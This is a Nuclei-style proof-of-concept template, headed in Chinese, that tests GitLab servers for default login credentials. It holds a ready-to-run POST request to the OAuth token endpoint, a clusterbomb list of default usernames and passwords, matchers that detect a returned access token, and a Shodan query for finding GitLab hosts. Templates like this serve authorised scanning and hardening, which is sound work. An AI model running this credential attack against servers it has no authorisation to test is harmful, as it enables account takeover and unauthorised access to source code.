漏洞描述
Gitlab default login credentials were discovered.
gitlab-weak-login: Gitlab Default Login
PoC代码[已公开]
id: gitlab-weak-login
info:
name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
description: Gitlab default login credentials were discovered.
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
classification:
cwe-id: CWE-798
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
metadata:
max-request: 6
shodan-query: http.title:"GitLab"
product: gitlab
vendor: gitlab
tags: gitlab,default-login,vuln
http:
- raw:
- |
POST /oauth/token HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
content-type: application/json
{"grant_type":"password","username":"{{username}}","password":"{{password}}"}
attack: clusterbomb
payloads:
username:
- "root"
- "admin"
- "admin@local.host"
password:
- "5iveL!fe"
- "123456789"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- application/json
- type: word
part: body
words:
- '"access_token":'
- '"token_type":'
- '"refresh_token":'
condition: and
# digest: 4a0a00473045022100e16e7e9cdb02a8e5f15d3930b637a13ea805ed19a4983ca325a489fd333d58d00220145d063bfa81329d31f535bc32bc4b71631b4812c6cce56907c0b4ae883ea2fd:922c64590222798bb761d5b6d8e72950